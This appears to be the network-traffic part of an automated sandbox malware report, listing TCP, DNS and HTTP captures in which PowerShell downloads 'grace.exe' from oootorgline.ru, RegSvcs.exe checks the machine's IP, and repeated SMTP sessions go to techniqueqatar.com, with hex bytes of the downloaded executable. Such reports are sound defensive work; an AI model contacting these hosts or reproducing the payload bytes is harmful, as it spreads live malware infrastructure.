                                                                      Sep 27, 2024 10:39:31.177242041 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:31.863718033 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:31.869550943 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:31.874593973 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.028579950 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.049669981 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.054681063 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.205918074 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.208182096 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.213023901 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.371865988 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.372162104 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.378123999 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.529844046 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.534398079 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.539354086 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.692858934 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.693131924 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.698151112 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.853941917 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:32.854136944 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:32.859549046 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.014722109 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.014929056 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.020451069 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.191643000 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.192235947 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.192277908 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.192305088 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.192322016 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.197213888 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.197318077 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.197510958 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.468732119 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.509339094 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.527435064 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.532481909 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.684020042 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.684199095 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.685208082 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.689428091 CEST58761255208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.689537048 CEST61255587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:33.690287113 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:33.690368891 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.285824060 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.288938999 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.293859005 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.448801994 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.480710030 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.485702038 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.639841080 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.653814077 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.658788919 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.815177917 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.815320969 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.821995974 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.976739883 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:34.976938009 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:34.982007027 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.136542082 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.136774063 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.141783953 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.297631025 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.297821045 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.303651094 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.460177898 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.460342884 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.465225935 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.638395071 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.639648914 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639718056 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639759064 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639796019 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639831066 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639918089 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.639965057 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.640039921 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.640079975 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.640088081 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:35.647453070 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.650254011 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.650264978 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:35.650274038 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:36.055511951 CEST58760905208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:36.103112936 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:45.757827044 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:45.757853985 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:45.757910967 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:45.761814117 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:45.761828899 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.219613075 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.219702005 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.221571922 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.221589088 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.221868038 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.274990082 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.276988983 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.319406986 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.385106087 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.385268927 CEST44360910104.26.13.205192.168.2.6
                                                                      Sep 27, 2024 10:39:46.385333061 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.387859106 CEST60910443192.168.2.6104.26.13.205
                                                                      Sep 27, 2024 10:39:46.397775888 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:46.402719975 CEST8060911208.95.112.1192.168.2.6
                                                                      Sep 27, 2024 10:39:46.402801037 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:46.402874947 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:46.407691002 CEST8060911208.95.112.1192.168.2.6
                                                                      Sep 27, 2024 10:39:46.875243902 CEST8060911208.95.112.1192.168.2.6
                                                                      Sep 27, 2024 10:39:46.931253910 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:47.453233957 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:47.462544918 CEST8060911208.95.112.1192.168.2.6
                                                                      Sep 27, 2024 10:39:47.465125084 CEST6091180192.168.2.6208.95.112.1
                                                                      Sep 27, 2024 10:39:47.577843904 CEST60905587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:47.916186094 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:47.921051979 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:47.922200918 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:48.495675087 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.495978117 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:48.500937939 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.656013012 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.659544945 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:48.664441109 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.820480108 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.821693897 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:48.826534986 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.983197927 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:48.983772993 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:48.988679886 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.212616920 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.212950945 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:49.217976093 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.374878883 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.375241995 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:49.380176067 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.537868023 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.538279057 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:49.543131113 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.868890047 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:49.869097948 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:49.873902082 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.049453020 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.049995899 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.050060987 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.050084114 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.050106049 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.056091070 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.056102991 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.056113005 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.056123972 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.316258907 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.353040934 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.358016014 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.514698029 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.515012980 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.515746117 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.520318031 CEST58760912208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.520392895 CEST60912587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:50.520597935 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:50.520673990 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.066147089 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.066314936 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.071264029 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.221191883 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.221904993 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.226787090 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.378034115 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.378743887 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.385137081 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.535609007 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.535824060 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.540633917 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.690300941 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.690522909 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.695416927 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.846152067 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:51.851798058 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:51.856807947 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.008380890 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.008574009 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.013519049 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.164768934 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.165067911 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.169914961 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.337244987 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.339211941 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339257002 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339281082 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339313030 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339349031 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339375973 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339401007 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339423895 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339445114 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.339463949 CEST60913587192.168.2.6208.91.198.176
                                                                      Sep 27, 2024 10:39:52.344127893 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.344288111 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.344558001 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.499825954 CEST58760913208.91.198.176192.168.2.6
                                                                      Sep 27, 2024 10:39:52.540688038 CEST60913587192.168.2.6208.91.198.176

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 27, 2024 10:39:05.030292988 CEST53628151.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:10.812020063 CEST5371553192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:11.079967976 CEST53537151.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:28.306246996 CEST5027353192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:28.313357115 CEST53502731.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:29.701720953 CEST6417753192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:29.708399057 CEST53641771.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:30.854154110 CEST6031853192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:31.170962095 CEST53603181.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:32.814682961 CEST5355497162.159.36.2192.168.2.6
                                                                      Sep 27, 2024 10:39:33.268306971 CEST5924453192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:33.275362015 CEST53592441.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:45.745012045 CEST5011953192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:45.751518011 CEST53501191.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:46.390655041 CEST5275653192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:46.397241116 CEST53527561.1.1.1192.168.2.6
                                                                      Sep 27, 2024 10:39:47.453769922 CEST5656153192.168.2.61.1.1.1
                                                                      Sep 27, 2024 10:39:47.905328989 CEST53565611.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Sep 27, 2024 10:39:10.812020063 CEST192.168.2.61.1.1.10x5ffStandard query (0)oootorgline.ruA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:28.306246996 CEST192.168.2.61.1.1.10xb555Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:29.701720953 CEST192.168.2.61.1.1.10x41beStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:30.854154110 CEST192.168.2.61.1.1.10x7ea4Standard query (0)techniqueqatar.comA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:33.268306971 CEST192.168.2.61.1.1.10xb415Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:45.745012045 CEST192.168.2.61.1.1.10x55f1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:46.390655041 CEST192.168.2.61.1.1.10x777fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:47.453769922 CEST192.168.2.61.1.1.10x2d1Standard query (0)techniqueqatar.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Sep 27, 2024 10:39:11.079967976 CEST1.1.1.1192.168.2.60x5ffNo error (0)oootorgline.ru176.99.3.36A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:28.313357115 CEST1.1.1.1192.168.2.60xb555No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:28.313357115 CEST1.1.1.1192.168.2.60xb555No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:28.313357115 CEST1.1.1.1192.168.2.60xb555No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:29.708399057 CEST1.1.1.1192.168.2.60x41beNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:31.170962095 CEST1.1.1.1192.168.2.60x7ea4No error (0)techniqueqatar.com208.91.198.176A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:33.275362015 CEST1.1.1.1192.168.2.60xb415Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:45.751518011 CEST1.1.1.1192.168.2.60x55f1No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:45.751518011 CEST1.1.1.1192.168.2.60x55f1No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:45.751518011 CEST1.1.1.1192.168.2.60x55f1No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:46.397241116 CEST1.1.1.1192.168.2.60x777fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Sep 27, 2024 10:39:47.905328989 CEST1.1.1.1192.168.2.60x2d1No error (0)techniqueqatar.com208.91.198.176A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • oootorgline.ru
                                                                      • api.ipify.org
                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.661254208.95.112.1804412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 27, 2024 10:39:29.714550018 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Sep 27, 2024 10:39:30.175986052 CEST175INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Sep 2024 08:39:29 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 6
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 45
                                                                      X-Rl: 43
                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                      Data Ascii: false


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.660911208.95.112.1805768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 27, 2024 10:39:46.402874947 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Sep 27, 2024 10:39:46.875243902 CEST175INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Sep 2024 08:39:46 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 6
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 28
                                                                      X-Rl: 42
                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                      Data Ascii: false


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.661245176.99.3.364431824C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-27 08:39:12 UTC179OUTGET /components/grace.exe HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: oootorgline.ru
                                                                      Connection: Keep-Alive
                                                                      2024-09-27 08:39:12 UTC306INHTTP/1.1 200 OK
                                                                      Server: nginx/1.20.2
                                                                      Date: Fri, 27 Sep 2024 08:39:12 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 1305263
                                                                      Connection: close
                                                                      Last-Modified: Fri, 27 Sep 2024 01:23:14 GMT
                                                                      ETag: "13eaaf-6230fb2f7c813"
                                                                      Accept-Ranges: bytes
                                                                      Strict-Transport-Security: max-age=31536000;
                                                                      2024-09-27 08:39:12 UTC16078INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 1e 94 bf 86 7f fa ec 86 7f fa ec 86 7f fa ec 15 31 62 ec 84 7f fa ec 9d e2 50 ec 29 7f fa ec 9d e2 51 ec b3 7f fa ec 8f 07 79 ec 8f 7f fa ec 8f 07 69 ec a7 7f fa ec 86 7f fb ec 96 7d fa ec 9d e2 4e ec ce 7f fa ec 9d e2 64 ec 9a 7f fa ec 9d e2 60 ec 87 7f fa ec 86 7f 6d ec 87 7f fa ec 9d e2 67 ec 87 7f fa ec 52 69 63 68 86 7f fa ec 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1bP)Qyi}Nd`mgRichPEL
                                                                      2024-09-27 08:39:12 UTC16384INData Raw: 89 0d 38 35 49 00 c7 05 40 35 49 00 ac a6 48 00 89 1d 50 35 49 00 89 1d 54 35 49 00 89 35 58 35 49 00 bb e6 a7 45 00 89 1d 70 35 49 00 33 db 89 1d 74 35 49 00 89 1d 78 35 49 00 bb 2a 72 47 00 89 1d 94 35 49 00 33 db 89 1d 98 35 49 00 89 1d 9c 35 49 00 bb 37 c9 45 00 89 1d b8 35 49 00 33 db 89 1d bc 35 49 00 89 1d c0 35 49 00 bb c1 c8 45 00 89 1d dc 35 49 00 33 db 89 1d e0 35 49 00 89 1d e4 35 49 00 bb 72 81 47 00 89 1d 00 36 49 00 33 db 89 1d 04 36 49 00 89 1d 08 36 49 00 bb 1e c5 45 00 89 1d 24 36 49 00 33 db 89 1d 28 36 49 00 89 1d 2c 36 49 00 bb 62 c8 45 00 89 1d 48 36 49 00 33 db 89 1d 4c 36 49 00 89 1d 50 36 49 00 bb ad 55 47 00 89 1d 6c 36 49 00 33 db 89 1d 70 36 49 00 89 1d 74 36 49 00 bb 96 55 47 00 89 1d 90 36 49 00 33 db 89 1d 94 36 49 00 89 1d
                                                                      Data Ascii: 85I@5IHP5IT5I5X5IEp5I3t5Ix5I*rG5I35I5I7E5I35I5IE5I35I5IrG6I36I6IE$6I3(6I,6IbEH6I3L6IP6IUGl6I3p6It6IUG6I36I
